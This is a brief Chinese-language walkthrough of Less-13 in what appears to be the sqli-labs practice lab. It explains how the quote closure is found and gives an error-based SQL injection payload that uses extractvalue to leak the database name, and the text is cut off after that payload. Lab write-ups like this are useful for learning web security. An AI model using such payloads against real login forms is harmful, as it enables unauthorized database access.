Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 通过报错可知 是通过’) 闭合的 发现没有登入成功返回信息 ,看来是要盲注了。 方法一,报错型 既然它返回错误信息了,说明有回显,可以报错注入。 样例payload uname=admin') and extractvalue(1,concat(0x7e,(select database()))) and (' <